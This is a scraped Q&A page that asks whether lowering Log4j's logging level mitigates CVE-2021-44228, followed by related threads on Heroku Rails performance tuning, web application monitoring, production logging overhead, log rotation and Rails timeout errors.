I believe I saw it mentioned in one of the security advisories about CVE-2021-44228 that reducing the logging level to ERROR or below can mitigate the vulnerability to some degree. I can't seem to find the same advisory again, possibly that piece of information has been removed since.
I found this explanation of CVE-2021-44228 that claims about exploitable log entries that The server logs this at the INFO level.
Would reducing the logging level to ERROR or below mitigate the vulnerability somewhat?
My understanding is that the attacker would need to trigger a logger.error() to inject a command, which is still possible, but less likely than with INFO level.
Related
I’ve set a client up with Heroku for their Ruby on Rails application and have had a great deal of trouble over the years with their application not running well regardless of how much money we spend on additional resources, find their documentation highly confusing. I’ve never been able to understand their specific terminology and documentation. We are constantly getting "H12" errors and "R14" errors etc. The memory usage and dyno loads are constantly spiking. And yet this is a small to medium-sized business without a massive amount of traffic. Wondering if anybody out there who does understand the ins and outs of Heroku can look this configuration over and tell me if it makes sense:
DB_POOL: 10
MALLOC_ARENA_MAX: 2
RAILS_MAX_THREADS: 5
WEB_CONCURRENCY: 4
Ruby 2.7
Rails 6.0
Puma
8 2x web dynos
5 1x worker dynos
$50 Postgres standard 0 database
$15 Memcachier
$10 Rediscloud
...etc addons
Your WEB_CONCURRENCY is too high for your Standard-2x dynos. The recommended default is 2: https://devcenter.heroku.com/articles/deploying-rails-applications-with-the-puma-web-server#recommended-default-puma-process-and-thread-configuration
This is likely contributing to your R14 errors as higher web concurrency means more memory usage. So you need to either lower your web concurrency (which may mean you also need to increase the # of dynos to compensate) or you need to use bigger dynos.
You already have MALLOC_ARENA_MAX=2 but not sure if you are using jemalloc. You might want to try that too.
Of course, you may also have other memory issues in your app - check out some tips here. I also recommend adding a monitoring tool like AppSignal as it's capable of tracking memory allocations per transaction.
For mitigating H12s:
Ensure you have installed something like the rack-timeout gem, which ensures that a long-running request is dropped at the dyno-level and thus avoids the H12 error (you get a Rack::TimeoutError exception instead). Set the timeout to 15s so that it is well under the 30s for H12 timeout.
Investigate your slow transactions. A monitoring tool is key here, i.e. New Relic (start with lowest-priced paid plan - free plan does not allow transaction tracing). Here is their blog post on how to trace transactions
When you've identified the problem - fix it!
if the bottleneck is external:
check for external API limits and throttling
add timeouts and make app resilient to slow external responses
if the bottleneck is due to the database:
optimize slow queries
check cache hit rates
check for the # of waiting connections and db locks -> if the number of waiting connections is consistently above 0 for X minutes, that indicates you have some long locks that you'll need to investigate. Waiting connections is easiest to track over time with Librato (free plan should do fine)
if the bottleneck is other app code:
add more custom instrumentation to get more insights, i.e. New Relic instructions
address app code issues
I want to stress the importance of monitoring tools to help diagnose issues and help determine optimal resource usage. Doing things like figuring out the correct concurrency configs, the correct size and # of dynos to run are virtually impossible without proper monitoring tools. Hopefully you have some already that are covered by your etc add-ons that are not listed, but if you do not, I'll summarize my recommendations and mention a couple other tips:
To get more metrics info, ensure you have enabled log-runtime-metrics
Also enable Ruby language metrics
Add a monitoring tool that can track Ruby memory allocations like AppSignal. Scout APM can do this too but I think their plans capable of this are more expensive (requires Scout Insights feature)
Add the lowest-paid version of New Relic. This is my go-to tool for transaction tracing. AppSignal can do this too if you don't want to pay for another tool, but I find it easier with New Relic.
Add Librato. It offers some great charts out of the box, including a set of Postgres charts in its own dashboard.
Set alerts in your monitoring apps to warn you about things like response times so you can look into them!
And of course, make all your changes in staging first AND load test them to see the impacts of your changes before attempting in production!
Update: I also just noticed that you said you are using Standard-0 Postgres, which means it has a 120 connection limit. So if you end up lowering your WEB_CONCURRENCY and increasing the # of dynos, watch out for your total connections to that database. Beyond just the fact that there is a limit, more connections also mean more overhead for your db anyway so if you are close to your connection limit, you are more likely to see db performance suffer. You may want to upgrade to another plan that has a higher connection limit or use pgbouncer as your connection pooler to avoid connection limits.
We are in the process of building a high-performance web application.
Unfortunately, there are times when performance unexpectedly degrades and we want to be able to monitor this so that we can proactively fix the problem when it occurs, as opposed to waiting for a user to report the problem.
So far, we are putting in place system monitors for metrics such as server memory usage, CPU usage and for gathering statistics on the database.
Whilst these show the overall health of the system, they don't help us when one particular user's session is slow. We have implemented tracing into our C# application which is particularly useful when identifying issues where data is the culprit, but for performance reasons tracing will be off by default and only enabled when trying to fix a problem.
So my question is are there any other best-practices that we should be considering (WMI for instance)? Is there anything else we should consider building into our web app that will benefit us without itself becoming a performance burden?
This depends a lot on your application, but I would always suggest to add your application metrics into your monitoring. For example number of recent picture uploads, number of concurrent users - I think you get the idea. Seeing the application specific metrics in combination with your server metrics like memory or CPU sometimes gives valuable insights.
In addition to system health monitoring (using Nagios) of parameters such as load, disk space, etc.., we
have built-in a REST service, called from Nagios, that provides statistics on
transactions pers second (which makes sense in our case)
number of active sessions
the number of errors in the logs per minute
....
in short, anything that is specific to the application(s)
monitor the time it takes for a (dummy) round trip transaction: as if an user or system was performing the business function
All this data being sent back to Nagios, we then configure alert levels and notifications.
We find that monitoring the number of Error entries in the logs gives some excellent short term warnings of a major crash/issue on the way for a lot of systems.
Many of our customers use Systems and Application Monitor, which handles the health monitoring, along with Synthetic End User Monitor, which runs continuous synthetic transactions to show you the performance of a web application from the end-user's perspective. It works for apps outside and behind the firewall. Users often tell us that SEUM will reveal availability problems from certain locations, or at certain times of day. You can download a free trial at
SolarWinds.com.
I hope this question isn't too vague, but does logging in a production environment cause a hit in performance? In addition to the traditional production.log logging, we have a couple of additional things we record in begin/rescue type events to help us for debugging issues.
In our production.rb file, our settings are:
config.log_level = :info
config.active_support.deprecation = :log
And we also have some:
TRACKER_LOG.warn xml_response_hash
These files can become quite large (1 or 2 GB each) and our website receives a couple million page views a month. Chould minimizing our use of logs on production help with performance?
Logging does impact on performance, but it can still be useful in production if it allows the people running the service to diagnose problems without taking the service down.
That said, a couple of million hits a month is less than 100k per day (on average) and that shouldn't be too much of a worry. Similarly, a few GB of log files should not be a worry provided the service is deployed sanely — and provided you're using a log rotation strategy of course — since disk space is pretty cheap. Thus at current levels, I'd suggest you should be OK. Keep an eye on it though; if traffic suddenly spikes (e.g., to 1M hits in a normal day) you could have problems. Document this! You don't want the production people to be surprised by these sorts of things.
Consider making the extra logging conditional on a flag that you can disable or enable at runtime so that you only collect anything large if you're looking for it; with usual volumes of logging data there's a good chance that you'll only look for problems occasionally anyway.
I have a rails app, where the speed of the application reduces significantly as the size of the log file increases. I need to deleted my log file(backup) frequently to prevent this. What is the best practice to avoid this.
Regards,
Pankaj
On a production environment, the ideal is to set logrotate rules for those logs (preferably daily).
We do it and never had performance issues due to logs.
Here's a brief article on how to use it.
We are using Rails 2.3.5 and have been experiencing seemingly random Timeout::Error: execution expired errors. The errors reported by Hoptoad are not consistently in any particular controller and show up everywhere from user sessions to account settings to some of our core functionality controllers.
The vast majority of requests do not Timeout but there are enough to cause concern.
Is this normal? If so, what are some things to look at to decrease the occurance? If not, has anyone run into this and what are some common problems that can trigger an error like this.
It is normal for requests to timeout, if your server is running under a heavy load. You should look to see if the timeouts are coincident with long-running SQL requests or some other activity that takes a lot of time. Often, you can decrease your timeouts by upgrading your hardware, or by optimizing your code in general. If you can't upgrade your hardware, try optimizing your longest running and most frequently accessed actions.